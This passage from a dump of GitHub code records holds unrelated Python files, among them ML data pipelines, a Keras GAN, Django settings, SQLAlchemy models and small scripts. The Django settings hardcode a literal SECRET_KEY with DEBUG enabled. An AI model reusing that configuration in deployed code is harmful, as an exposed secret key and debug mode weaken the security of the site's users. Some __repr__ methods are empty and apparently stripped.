__name__==\"__main__\":\n rospy.init_node(\"data_recorder\", anonymous=True) \n\n time.sleep(5) \n\n Recorder()\n\n rospy.spin()\n\n","repo_name":"Arena-Rosnav/arena-evaluation","sub_path":"scripts/data_recorder_node.py","file_name":"data_recorder_node.py","file_ext":"py","file_size_in_byte":7438,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"39737130472","text":"from typing import List, Union\n\nimport numpy as np\nimport tensorflow as tf\n\nimport nn_utils.math_utils as math_utils\nfrom dataflow.illumination_integration.helper import getBilinearFromUv\nfrom nn_utils.math_utils import shape_to_uv, uv_to_direction\n\n\n@tf.function\ndef map_levels_to_samples(\n num_roughness_0: int, num_random_roughness: int, data_levels: List[tf.Tensor],\n):\n # Setup uvs\n env_shape = data_levels[0].shape\n uvs = shape_to_uv(*env_shape[:-1])\n uvs_flat = tf.reshape(uvs, [-1, 2])\n\n total_directions_required = num_roughness_0 + num_random_roughness\n\n if uvs_flat.shape[0] < total_directions_required:\n repeats_required = tf.cast(\n tf.math.ceil(total_directions_required / uvs_flat.shape[0]), tf.int32\n )\n uvs_flat = math_utils.repeat(uvs_flat, repeats_required, 0)\n\n uvs_shuffle = tf.random.shuffle(uvs_flat)\n uvs_random = uvs_shuffle[:total_directions_required]\n\n jitter = tf.random.normal(uvs_random.shape, mean=0.0, stddev=0.3)\n uvs_random = uvs_random + jitter\n\n # Setup roughness\n roughness_random = tf.clip_by_value(\n tf.random.uniform(\n (num_random_roughness, 1), minval=1 / 255, maxval=1 + 1 / 255\n ),\n 0,\n 1,\n )\n\n r0_uvs = uvs_random[:num_roughness_0]\n rnd_uvs = uvs_random[num_roughness_0 : num_roughness_0 + num_random_roughness]\n\n # Get samples\n samples_random = random_uv_roughness_access(data_levels, rnd_uvs, roughness_random)\n\n # Always get r0 samples\n samples_r0 = random_uv_roughness_access(\n data_levels, r0_uvs, tf.zeros_like(r0_uvs[:, :1])\n )\n\n ret = (\n uv_to_direction(r0_uvs),\n samples_r0,\n uv_to_direction(rnd_uvs),\n roughness_random,\n samples_random,\n )\n\n return (\n data_levels,\n *ret,\n )\n\n\n@tf.function\ndef full_map_samples(num_roughness_steps: int, data_levels: List[tf.Tensor]):\n # Setup random roughnesses and get all values\n full_uvs = tf.reshape(shape_to_uv(*data_levels[0].shape[:-1]), (-1, 2))\n\n roughness_steps = np.linspace(0.0, 1.0, num_roughness_steps, dtype=np.float32)[\n :, None\n ] # Add a dimension\n\n # Store the roughness steps\n all_samples = tf.TensorArray(\n tf.float32, size=num_roughness_steps, clear_after_read=True\n )\n\n for i, r in enumerate(roughness_steps): # The dimension is removed in the for loop\n r = math_utils.repeat(\n r[:, None], full_uvs.shape[0], 0\n ) # Add a batch dimension back\n\n samples = random_uv_roughness_access(data_levels, full_uvs, r)\n all_samples = all_samples.write(i, samples) # Write the sample\n\n ret = (\n uv_to_direction(full_uvs),\n tf.convert_to_tensor(roughness_steps),\n all_samples.stack(),\n )\n\n return (\n data_levels,\n *ret,\n )\n\n\n@tf.function\ndef random_uv_roughness_access(data_levels, uvs, roughness):\n tf.debugging.assert_shapes(\n [(uvs, (\"S\", 2)), (roughness, (\"S\", 1)),]\n + [(d, (\"H%d\" % i, \"W%d\" % i, 3)) for i, d in enumerate(data_levels)]\n )\n # data_levels: List[H, W, 3]\n # uvs: [S, 2]\n # Roughness: [S, 1]\n\n # Result: [S, 3]\n\n smpl_list = []\n for d in data_levels:\n samples_level = getBilinearFromUv(d[None, ...], uvs[None, ...])[0]\n smpl_list.append(samples_level)\n\n level_samples_batched = tf.stack(smpl_list, 0) # M, S, 3\n\n return interpolate_roughness_levels(level_samples_batched, roughness)\n\n\n@tf.function\ndef interpolate_roughness_levels(samples, roughness):\n tf.debugging.assert_shapes(\n [(samples, (\"M\", \"S\", 3)), (roughness, (\"S\", 1)),]\n )\n\n # Setup the roughness interpolation\n roughness_mip_index = roughness[:, 0] * (samples.shape[0] - 1)\n # S\n lower_mip_index = tf.cast(tf.math.floor(roughness_mip_index), tf.int32)\n upper_mip_index = tf.cast(tf.math.ceil(roughness_mip_index), tf.int32)\n\n # Fetch the lower and upper roughness levels\n rgh_low = tf.gather(\n tf.transpose(samples, [1, 0, 2]), lower_mip_index[..., None], batch_dims=1\n )[:, 0]\n rgh_hgh = tf.gather(\n tf.transpose(samples, [1, 0, 2]), upper_mip_index[..., None], batch_dims=1\n )[:, 0]\n\n tf.debugging.assert_shapes(\n [\n (samples, (\"M\", \"S\", 3)),\n (roughness, (\"S\", 1)),\n (rgh_low, (\"S\", 3)),\n (rgh_hgh, (\"S\", 3)),\n ]\n )\n\n # Start interpolation\n fraction_index = roughness_mip_index - tf.cast(lower_mip_index, tf.float32)\n fraction_index = tf.reshape(fraction_index, roughness.shape)\n\n samples_random = rgh_low * fraction_index + rgh_hgh * (1 - fraction_index)\n return samples_random\n\n\n@tf.function\ndef blend_two_maps(*batch_2_data):\n ret = []\n for b in batch_2_data:\n b0 = b[0]\n b1 = b[1]\n alpha = tf.random.uniform((1,))\n ret.append(alpha * b0 + (1 - alpha) * b1)\n return ret\n\n\n@tf.function\ndef specify_mip_levels_to_fetch(\n dataset: List[Union[List[np.ndarray], np.ndarray]], idxs: List[int]\n):\n random_sampled_targets = dataset[1:]\n ret = []\n for idx in idxs:\n ret.append(dataset[0][idx])\n\n ret.extend(random_sampled_targets)\n\n return (*ret,)\n\n\ndef random_sample_dataflow(\n dataset: List[np.ndarray],\n samples_roughness_0: int,\n samples_random_roughness: int,\n batch_size: int,\n with_blend: bool = False,\n full_l0: bool = False,\n shuffle: bool = True,\n):\n dataset_len = len(dataset[0])\n ds = tf.data.Dataset.from_tensor_slices((*dataset,))\n if shuffle:\n ds = ds.shuffle(dataset_len, reshuffle_each_iteration=True)\n\n if with_blend:\n ds = ds.batch(2, drop_remainder=True)\n ds = ds.map(blend_two_maps)\n ds = ds.repeat(2)\n\n if full_l0:\n ds = ds.map(\n lambda *x: full_map_samples(5, x), num_parallel_calls=tf.data.AUTOTUNE,\n )\n else:\n ds = ds.map(\n lambda *x: map_levels_to_samples(\n samples_roughness_0, samples_random_roughness, x\n ),\n num_parallel_calls=tf.data.AUTOTUNE,\n )\n\n ds = ds.map(lambda *x: specify_mip_levels_to_fetch(x, [0]))\n\n if batch_size > 0:\n ds = ds.batch(batch_size)\n ds = ds.prefetch(5)\n\n return ds\n","repo_name":"cgtuebingen/Neural-PIL","sub_path":"dataflow/illumination_integration/dataflow.py","file_name":"dataflow.py","file_ext":"py","file_size_in_byte":6258,"program_lang":"python","lang":"en","doc_type":"code","stars":93,"dataset":"github-code","pt":"48"} +{"seq_id":"13207753294","text":"\nimport subprocess\n\n# this marks the start of a simple project to get approx ink levels of the default printer (canon pixma)\n# and eventually send this info automatically somewhere useful \n\ncolours = ['Magenta', 'Black', 'Yellow', 'BlackPGBK', 'Cyan']\n\n\ndef get_supply_info():\n\tinfo = (subprocess.check_output([\"./printlev.sh\"]))\n\tinfo_pre = (info.decode())\n\tinfo_str = info_pre.rstrip()\n\tinfo_split = info_str.split(\",\")\n\tpercent_val = map(( lambda x: x + '%'), info_split)\n\t\n\tdict_from_list = dict(zip(colours, percent_val))\n\tfor key, value in dict_from_list.items():\n\t\tprint(key, ' : ', value)\n\n\n\n\n\nif __name__ == \"__main__\":\n get_supply_info()\n","repo_name":"ahavell/useful-scripts","sub_path":"Printers/supply.py","file_name":"supply.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12930271727","text":"#coding:utf-8\nimport os\n\nPROJECT_PATH = os.path.dirname(os.path.abspath(__file__))\n\nDEBUG = True\nTEMPLATE_DEBUG = DEBUG\nADMINS = (\n # ('Your Name', 'your_email@example.com'),\n)\n\nMANAGERS = ADMINS\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3', # Add 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'oracle'.\n 'NAME': os.path.join(PROJECT_PATH, 'dev.sqlite'), # Or path to database file if using sqlite3.\n 'USER': '',\n 'PASSWORD': '',\n 'HOST': '', # Empty for localhost through domain sockets or '127.0.0.1' for localhost through TCP.\n 'PORT': '', # Set to empty string for default.\n }\n}\n\nLOGIN_REDIRECT_URL = '/'\nMAX_ROOMS_COUNT = 5\nMESSAGE_HISTORY_NUMBER = 10\nSPAM_PAUSE = 5 # секунды\nTORNADO_HOST = 'localhost'\nTORNADO_PORT = '8080'\nCHAT_LOG_NAME = os.path.join(PROJECT_PATH, 'chat_debug_log.txt')\n\nTEMPLATE_CONTEXT_PROCESSORS = (\n 'django.contrib.auth.context_processors.auth',\n 'django.core.context_processors.debug',\n 'django.core.context_processors.i18n',\n 'django.core.context_processors.media',\n 'django.core.context_processors.static',\n 'django.core.context_processors.tz',\n 'django.core.context_processors.request',\n 'django.contrib.messages.context_processors.messages',\n 'chat_app.context_processors.tornado_host_port',\n)\n\nALLOWED_HOSTS = []\n\nTIME_ZONE = 'Europe/Moscow W-SU'\n\nLANGUAGE_CODE = 'ru'\n\nSITE_ID = 1\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\nMEDIA_ROOT = ''\n\nMEDIA_URL = ''\n\nSTATIC_URL = '/static/'\n\nSTATICFILES_DIRS = (\n os.path.join(PROJECT_PATH, 'static'),\n)\n\nSTATICFILES_FINDERS = (\n 'django.contrib.staticfiles.finders.FileSystemFinder',\n 'django.contrib.staticfiles.finders.AppDirectoriesFinder',\n# 'django.contrib.staticfiles.finders.DefaultStorageFinder',\n)\n\nSECRET_KEY = 'qg=&h9j$f$u*%l+7+ikvcsbyy(8w%_3_50fzbf2a5mv5j=x#kx'\n\nTEMPLATE_LOADERS = (\n 'django.template.loaders.filesystem.Loader',\n 'django.template.loaders.app_directories.Loader',\n# 'django.template.loaders.eggs.Loader',\n)\n\nMIDDLEWARE_CLASSES = (\n 'django.middleware.common.CommonMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n # Uncomment the next line for simple clickjacking protection:\n # 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n)\n\nROOT_URLCONF = 'tornadochat.urls'\n\nWSGI_APPLICATION = 'tornadochat.wsgi.application'\n\nTEMPLATE_DIRS = (\n os.path.join(PROJECT_PATH, 'templates')\n)\n\nINSTALLED_APPS = (\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.sites',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'django.contrib.admin',\n # 'django.contrib.admindocs',\n 'chat_app',\n 'south',\n)\n\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'filters': {\n 'require_debug_false': {\n '()': 'django.utils.log.RequireDebugFalse'\n }\n },\n 'handlers': {\n 'mail_admins': {\n 'level': 'ERROR',\n 'filters': ['require_debug_false'],\n 'class': 'django.utils.log.AdminEmailHandler'\n }\n },\n 'loggers': {\n 'django.request': {\n 'handlers': ['mail_admins'],\n 'level': 'ERROR',\n 'propagate': True,\n },\n }\n}\n","repo_name":"4l1fe/chat-tornado","sub_path":"tornadochat/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":3557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42136674949","text":"import argparse\nimport contraband.param_mapping as mapping\nimport os\nfrom pprint import pformat\nfrom contraband import utils\n\n\ndef get_args():\n\n parser = argparse.ArgumentParser()\n parser.add_argument('-dataset')\n parser.add_argument('-exp')\n parser.add_argument('-index')\n parser.add_argument('-checkpoints',\n nargs='+')\n args = vars(parser.parse_args())\n\n exp = args['exp']\n\n dataset = args['dataset']\n datasets = ['fluo', '17_A1']\n if dataset not in datasets:\n raise ValueError(\"invalid dataset name\")\n\n index = None\n try:\n index = int(args['index'])\n except Exception as e:\n print(e)\n if index is None:\n raise ValueError(\"index is not specified or is not an int\")\n\n checkpoints = []\n if 'checkpoints' in args:\n checkpoints = args['checkpoints']\n\n return dataset, exp, index, checkpoints\n\n\ndef make_dirs(logdir, index):\n\n curr_log_dir = os.path.join(logdir, \"combination-\" + str(index))\n os.makedirs(curr_log_dir, exist_ok=True)\n assert os.path.isdir(curr_log_dir), \\\n os.path.join(\"Dir \", curr_log_dir, \"doesn't exist\")\n\n os.makedirs(curr_log_dir + '/contrastive/checkpoints', exist_ok=True)\n os.makedirs(os.path.join(curr_log_dir, 'seg'), exist_ok=True)\n\n assert os.path.isdir(curr_log_dir + '/contrastive/checkpoints'), \\\n \"Dir \" + curr_log_dir + \"doesn't exist\"\n assert os.path.isdir(curr_log_dir + '/seg'), \\\n \"Dir \" + curr_log_dir + \"doesn't exist\"\n\n return curr_log_dir\n\n\ndef get_logdir(dataset, expirement_num):\n\n expirement_dir = [\n filename\n for filename in os.listdir(os.path.join(\"expirements\", dataset))\n if filename.startswith('EXP' + str(expirement_num))\n ][0]\n\n logdir = os.path.join(\"expirements\", dataset, expirement_dir)\n\n assert os.path.isdir(\n logdir), \"Dir \" + logdir + \" doesn't exist\"\n\n return logdir, expirement_dir\n\n\ndef get_params(params):\n\n contrastive_params = mapping.generate_param_grid(params['contrastive'])\n seg_params = mapping.generate_param_grid(params['seg'])\n model_params = params['model']\n if 'save_embs' in params:\n embedding_params = params['save_embs']\n\n # Get correct combinations of parameters\n index_combs = {\n \"contrastive\": contrastive_params,\n \"model\": model_params\n }\n index_combs = mapping.generate_param_grid(index_combs)\n contrastive_params = [comb['contrastive'] for comb in index_combs]\n model_params = [comb['model'] for comb in index_combs]\n\n return contrastive_params, seg_params, model_params, embedding_params\n\n\ndef get_model(index, model_params, logger):\n logger.info(f\"Model params: {pformat(model_params[index])}\")\n\n mapping.map_model_params(model_params[index])\n\n model = model_params[index]['model']\n\n return model\n\n\ndef log_params(curr_log_dir, index, root_handler, params):\n \"\"\"\n Logs the parameters given.\n \"\"\"\n logger = utils.create_logger(curr_log_dir, index=index)\n logger.addHandler(root_handler)\n\n logger.info(\"Current log dir: \" + curr_log_dir)\n logger.info('Training with parameter combination ' + str(index))\n logger.info(\"With parameters: \" + pformat(params[index]))\n logger.info(\"\")\n","repo_name":"funkelab/contraband","sub_path":"contraband/script_utils.py","file_name":"script_utils.py","file_ext":"py","file_size_in_byte":3259,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"25654571515","text":"def cmb(n, r, mod):\n if r < 0 or n < r:\n return 0\n r = min(r, n - r)\n numerator, denominator = 1, 1\n for i in range(1, r + 1):\n numerator = (numerator * (n + 1 - i)) % mod\n denominator = (denominator * i) % mod\n return numerator * pow(denominator, mod - 2, mod) % mod\n\n\ndef solve():\n W, H = map(int, input().split())\n MOD = 10 ** 9 + 7\n ans = cmb(W + H - 2, H - 1, MOD)\n print(ans)\n\n\nif __name__ == '__main__':\n solve()\n","repo_name":"yuly3/atcoder","sub_path":"ABC/ABC034/C.py","file_name":"C.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"37853681242","text":"#import keras\nfrom keras.models import Sequential, Model\nfrom keras.layers import Dense, Activation, Conv2D, Reshape, BatchNormalization\nfrom keras.layers import LeakyReLU, Dropout, Flatten, UpSampling2D, Input, ZeroPadding2D\nfrom keras import optimizers\nfrom keras.datasets import mnist\n#import numpy\nimport numpy as np\n#import matplotlib\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\n\nclass GAN():\n\tdef __init__(self):\n\t\tself.input_shape = (28, 28, 1)\n\t\tself.latent_dim = 100\n\t\t#input layer\n\t\tinput = Input(shape = (100,))\n\n\t\tself.discriminator = self.make_discriminator()\n\t\tself.discriminator.compile(loss='binary_crossentropy', optimizer= 'adam', metrics=['accuracy'])\n\n\t\tself.generator = self.make_generator()\n\t\t#img layer\n\t\timg = self.generator(input)\t\n\n\t\tself.combined = Model(input, self.discriminator(img))\n\t\tself.discriminator.trainable = False\n\t\tself.combined.compile(loss='binary_crossentropy', optimizer= 'adam')\n\n\n\tdef generate_noise(self, amount):\n\t\treturn np.random.normal(0, 1, (amount, self.latent_dim))\n\n\tdef make_generator(self):\n\t\tmodel = Sequential()\n\t\tmodel.add(Dense(128 * 7 * 7, activation=\"relu\", input_dim=self.latent_dim))\n\t\tmodel.add(Reshape((7, 7, 128)))\n\t\tmodel.add(UpSampling2D())\n\t\tmodel.add(Conv2D(128, kernel_size=3, padding=\"same\"))\n\t\tmodel.add(BatchNormalization(momentum=0.8))\n\t\tmodel.add(Activation(\"relu\"))\n\t\tmodel.add(UpSampling2D())\n\t\tmodel.add(Conv2D(64, kernel_size=3, padding=\"same\"))\n\t\tmodel.add(BatchNormalization(momentum=0.8))\n\t\tmodel.add(Activation(\"relu\"))\n\t\tmodel.add(Conv2D(1, kernel_size=3, padding=\"same\"))\n\t\tmodel.add(Activation(\"tanh\"))\n\t\tinput = Input(shape = (100, ))\n\t\timg = model(input)\n\t\treturn Model(input, img)\n\n\tdef make_discriminator(self):\n\t\tmodel = Sequential()\n\t\tmodel.add(Conv2D(32, kernel_size=3, strides=2, input_shape= (28, 28, 1), padding=\"same\"))\n\t\tmodel.add(LeakyReLU(alpha=0.2))\n\t\tmodel.add(Dropout(0.25))\n\t\tmodel.add(Conv2D(64, kernel_size=3, strides=2, padding=\"same\"))\n\t\tmodel.add(ZeroPadding2D(padding=((0,1),(0,1))))\n\t\tmodel.add(BatchNormalization(momentum=0.8))\n\t\tmodel.add(LeakyReLU(alpha=0.2))\n\t\tmodel.add(Dropout(0.25))\n\t\tmodel.add(Conv2D(128, kernel_size=3, strides=2, padding=\"same\"))\n\t\tmodel.add(BatchNormalization(momentum=0.8))\n\t\tmodel.add(LeakyReLU(alpha=0.2))\n\t\tmodel.add(Dropout(0.25))\n\t\tmodel.add(Conv2D(256, kernel_size=3, strides=1, padding=\"same\"))\n\t\tmodel.add(BatchNormalization(momentum=0.8))\n\t\tmodel.add(LeakyReLU(alpha=0.2))\n\t\tmodel.add(Dropout(0.25))\n\t\tmodel.add(Flatten())\n\t\tmodel.add(Dense(1, activation='sigmoid'))\n\n\t\timg = Input(shape= (28, 28, 1))\n\t\tvalidity = model(img)\n\n\t\treturn Model(img, validity)\n\n\n\tdef train(self, epoch, save_interval):\n\t\t#manipulate trainning data\n\t\t(X_train, _), (_, _) = mnist.load_data()\n\t\tX_train = X_train / 127.5 - 1\n\t\tX_train = np.expand_dims(X_train, axis=3)\n\n\t\tsize = len(X_train)\n\t\ttrue = np.ones((size, 1))\n\t\tfalse = np.zeros((size, 1))\t\t\n\t\tfor i in range(epoch):\n\t\t\tnoise = self.generate_noise(len(X_train))\n\t\t\tfalse_image = self.generator.predict(noise)\n\t\t\t''' train discriminator '''\n\t\t\tself.discriminator.fit(X_train, true, batch_size = int(size / 10), epochs = 2)\n\t\t\tself.discriminator.fit(false_image, false, batch_size = int(size / 10), epochs = 2)\n\t\t\t'''train generator '''\n\t\t\tself.combined.fit(noise, true, batch_size = int(size / 100), epochs = 1)\n\t\t\tif (i % save_interval == 0):\n\t\t\t\tself.save_progress(i)\n\n\tdef save_progress(self, epoch):\n\t\tr, c = 5, 5\n\t\tnoise = self.generate_noise(r * c)\n\t\tgen_imgs = self.generator.predict(noise)\n\t\tprint(gen_imgs[0].shape)\n\t\t# Rescale images 0 - 1\n\n\t\tgen_imgs = 0.5 * gen_imgs + 0.5\n\n\t\tfig, axs = plt.subplots(r, c)\n\t\tcnt = 0\n\t\tfor i in range(r):\n\t\t\tfor j in range(c):\n\t\t\t\taxs[i,j].imshow(gen_imgs[cnt, :,:,0], cmap='gray')\n\t\t\t\taxs[i,j].axis('off')\n\t\t\t\tcnt += 1\n\t\tfig.savefig(\"images/mnist_%d.png\" % epoch, format = 'png')\n\t\tprint(\"saved\")\n\t\tplt.close()\nif __name__ == '__main__':\n\tg = GAN()\n\tg.train(50, 10)","repo_name":"tommywei110/machine-leanring-implementation","sub_path":"GAN/gan.py","file_name":"gan.py","file_ext":"py","file_size_in_byte":3920,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8690078525","text":"# cook your dish here\nt=int(input())\nfor j in range(t):\n n,k=map(int,input().split())\n c=list(map(str,input().split()))\n for i in range(k):\n s=c.pop()\n if(s=='H'):\n for l in range(len(c)):\n if(c[l]=='H'):\n c[l]='T'\n else:\n c[l]='H'\n print(c.count('H'))","repo_name":"dhruv-gautam16/Code_Chef-Contest-","sub_path":"POPGATES.py","file_name":"POPGATES.py","file_ext":"py","file_size_in_byte":357,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"48"} +{"seq_id":"5562090033","text":"from flask_sqlalchemy import SQLAlchemy\nfrom sqlalchemy import ForeignKey\nfrom datetime import datetime\nfrom sqlalchemy.sql.schema import PrimaryKeyConstraint\ndb = SQLAlchemy()\n\n\n# Python file providing the model for our database schema\n\nclass users(db.Model):\n __tablename__ = 'users'\n __table_args__ = {'sqlite_autoincrement': True}\n\n user_id = db.Column(db.Integer, primary_key=True, nullable=False, autoincrement=True)\n username = db.Column(db.String(30), nullable=False)\n password = db.Column(db.String(30), nullable=False)\n\n def __init__(self, user_id, username, password):\n self.user_id = user_id\n self.username = username\n self.password = password\n\n def __repr__(self):\n return f\"\"\n\n\nclass eventTable(db.Model):\n __tablename__ = 'eventTable'\n\n event_id = db.Column(db.Integer, primary_key=True, nullable=False)\n event_desc = db.Column(db.String(30), nullable=False)\n event_type = db.Column(db.String(30), nullable=False)\n event_start = db.Column(db.DateTime, nullable=False, default=datetime.utcnow)\n event_end = db.Column(db.DateTime, nullable=False, default=datetime.utcnow)\n event_code = db.Column(db.String(10), nullable=False)\n event_completed = db.Column(db.Integer, nullable=False)\n\n def __init__(self, event_id, event_desc, event_type, event_start, event_end, event_code, event_completed):\n self.event_id = event_id\n self.event_desc = event_desc\n self.event_type = event_type\n self.event_start = event_start\n self.event_end = event_end\n self.event_code = event_code\n self.event_completed = event_completed\n\n def __repr__(self):\n return f\"\"\n\nclass eventAttendees(db.Model):\n __tablename__ = 'eventAttendees'\n\n user_id = db.Column(db.Integer, ForeignKey('users.user_id'), nullable=False)\n event_id = db.Column(db.Integer, ForeignKey('eventTable.event_id'), nullable=False)\n __table_args__ = (PrimaryKeyConstraint('user_id', 'event_id'),{},)\n\n def __init__(self, user_id, event_id):\n self.user_id = user_id\n self.event_id = event_id\n\n def __repr__(self):\n return f\"\"\n\nclass eventHosts(db.Model):\n __tablename__ = 'eventHosts'\n\n user_id = db.Column(db.Integer, ForeignKey('users.user_id'), nullable=False)\n event_id = db.Column(db.Integer, ForeignKey('eventTable.event_id'), nullable=False)\n __table_args__ = (PrimaryKeyConstraint('user_id', 'event_id'),{},)\n \n def __init__(self, user_id, event_id):\n self.user_id = user_id\n self.event_id = event_id\n\n def __repr__(self):\n return f\"\"\n\nclass feedbackQuestions(db.Model):\n __tablename__ = 'feedbackQuestions'\n\n feedback_question_id = db.Column(db.Integer, primary_key=True, nullable=False)\n feedback_question = db.Column(db.String(100), nullable=False)\n event_id = db.Column(db.Integer, ForeignKey('eventTable.event_id'), nullable=False)\n\n def __init__(self, feedback_question_id, feedback_question, event_id):\n self.feedback_question_id = feedback_question_id\n self.feedback_question = feedback_question\n self.event_id = event_id\n\n def __repr__(self):\n return f\"\" \n\nclass feedback(db.Model):\n __tablename__ = 'feedback'\n\n feedback_id = db.Column(db.Integer, primary_key=True, nullable=False)\n feedback_question_id = db.Column(db.Integer, db.ForeignKey('feedbackQuestions.feedback_question_id'), nullable=False)\n event_id = db.Column(db.Integer, ForeignKey('eventTable.event_id'), nullable=False)\n user_id = db.Column(db.Integer, ForeignKey('users.user_id'), nullable=False)\n message = db.Column(db.String(300), nullable=False)\n feedback_date = db.Column(db.DateTime, nullable=False, default=datetime.utcnow)\n mood = db.Column(db.Float, nullable=False)\n sentiment = db.Column(db.Float, nullable=False)\n isAnonymous = db.Column(db.Integer, default = 0)\n\n def __init__(self, feedback_id, feedback_question_id, event_id, user_id, message, feedback_date, mood, sentiment, isAnonymous):\n self.feedback_id = feedback_id\n self.feedback_question_id = feedback_question_id\n self.event_id = event_id\n self.user_id = user_id\n self.message = message\n self.feedback_date = feedback_date\n self.mood = mood\n self.sentiment = sentiment\n self.isAnonymous = isAnonymous\n\n def __repr__(self):\n return f\"\"\n","repo_name":"CS261-Group-20/cs261-cw","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4971,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22305319702","text":"import requests\n\nclass TestClass:\n def test_send_report(self):\n token = \"[paste your token here]\"\n headers = {\n \"Authorization\": \"Bearer \" + token,\n }\n\n url = \"https://api.zephyrscale.smartbear.com/v2/automations/executions/junit?projectKey=[paste your project key from jira]\"\n report = {\"file\": open(\"[paste path to your xml report]\", \"rb\")}\n\n r = requests.post(\n url,\n headers=headers,\n files=report)\n\n assert r.status_code == 200 or 201\n","repo_name":"Aszton/Zephyr-Jira-Integration","sub_path":"requests/send_report.py","file_name":"send_report.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1821499773","text":"import torch\nimport torch.nn as nn\nimport torchvision\nimport torchvision.transforms as transforms\n\nfrom discriminator import Discriminator\nfrom data_tools import data_loader_and_transformer\n\nimport argparse\ndef str2bool(v):\n return v.lower() in (\"yes\", \"true\", \"t\", \"1\")\n\nparser = argparse.ArgumentParser(description=\"Train the Discriminator without the Generator\")\n\n# Hyperparameters.\nparser.add_argument(\"--lr\", default=0.0001, type=float, \n help=\"learning rate\")\nparser.add_argument(\"--epochs\", default=100, type=int, \n help=\"number of training epochs\")\nparser.add_argument(\"--batch_size\", default=128, type=int, \n help=\"batch size\")\n\n# Model options.\nparser.add_argument(\"--load_checkpoint\", default=False, type=str2bool, \n help=\"resume from checkpoint\")\n\nargs = parser.parse_args()\n\n\n# Load data.\nprint(\"==> Loading data...\")\ntrainloader, testloader = data_loader_and_transformer(args.batch_size)\n\ndevice = 'cuda' if torch.cuda.is_available() else 'cpu'\n\n# Load model.\nprint(\"==> Initializing model...\")\nmodel = Discriminator()\nif args.load_checkpoint:\n print(\"==> Loading checkpoint...\")\n model = torch.load('cifar10.model')\nmodel = model.to(device)\n\ncriterion = nn.CrossEntropyLoss()\noptimizer = torch.optim.Adam(model.parameters(), lr=args.lr)\n\n\n# --------------------------\n# Single train and test step\n# --------------------------\n\ndef train(epoch):\n # Set to train mode.\n model.train()\n\n # Avoid the potential overflow error from Adam.\n if epoch > 10:\n for group in optimizer.param_groups:\n for p in group['params']:\n state = optimizer.state[p]\n if ('step' in state) and (state['step'] >= 1024):\n state['step'] = 1000\n \n # Learning rate schedule.\n if epoch == 50:\n for param_group in optimizer.param_groups:\n param_group['lr'] = args.lr / 10.0\n if epoch == 75:\n for param_group in optimizer.param_groups:\n param_group['lr'] = args.lr / 100.0\n \n # To monitor the training process.\n running_loss = 0\n total_correct = 0\n total_samples = 0\n \n # Start training this epoch.\n for batch_index, (images, labels) in enumerate(trainloader):\n\n images = images.to(device)\n labels = labels.to(device)\n\n optimizer.zero_grad()\n _, outputs = model(images)\n\n loss = criterion(outputs, labels)\n loss.backward()\n\n optimizer.step()\n\n # Loss.\n running_loss += loss.item()\n curt_loss = running_loss / (batch_index + 1)\n\n # Accuracy.\n _, predict_label = torch.max(outputs, 1)\n total_samples += labels.shape[0]\n total_correct += predict_label.eq(labels.long()).float().sum().item()\n accuracy = total_correct / total_samples\n\n print('Training [epoch: %d] loss: %.3f, accuracy: %.5f' %\n (epoch + 1, curt_loss, accuracy))\n \n if epoch + 1 == args.epochs // 5:\n print(\"=> Saving model checkpoint...\")\n torch.save(model,'cifar10.model')\n\ndef test(epoch):\n # Set to test mode.\n model.eval()\n\n # To monitor the testing process.\n running_loss = 0\n total_correct = 0\n total_samples = 0\n\n # Testing step.\n with torch.no_grad():\n for batch_index, (images, labels) in enumerate(testloader):\n \n images = images.to(device)\n labels = labels.to(device)\n\n _, outputs = model(images)\n loss = criterion(outputs, labels)\n \n # Loss.\n running_loss += loss.item()\n curt_loss = running_loss / (batch_index + 1)\n\n # Accuracy\n _, predict_label = torch.max(outputs, 1)\n total_samples += labels.shape[0]\n total_correct += predict_label.eq(labels.long()).float().sum().item()\n accuracy = total_correct / total_samples\n \n print('Testing [epoch: %d] loss: %.3f, accuracy: %.5f' %\n (epoch + 1, curt_loss, accuracy))\n\n\n# --------------------------\n# Start training and testing\n# --------------------------\n\nprint(\"==> Start training on device {}...\".format(device))\nprint(\"\\tHyperparameters: LR = {}, EPOCHS = {}, BATCH_SIZE = {}\"\n .format(args.lr, args.epochs, args.batch_size))\n\nfor epoch in range(args.epochs):\n train(epoch)\n test(epoch)\n\nprint(\"==> Training finished. Saving model checkpoint...\")\ntorch.save(model,'cifar10.model')","repo_name":"zero91/cs598-deep-learning-fall-2018","sub_path":"homework/hw6/train_discriminator.py","file_name":"train_discriminator.py","file_ext":"py","file_size_in_byte":4476,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"16864396581","text":"# built-in\nfrom pathlib import Path\n\n# project\nfrom dephell.converters.wheel import WheelConverter\n\n\ndef test_load_deps(requirements_path: 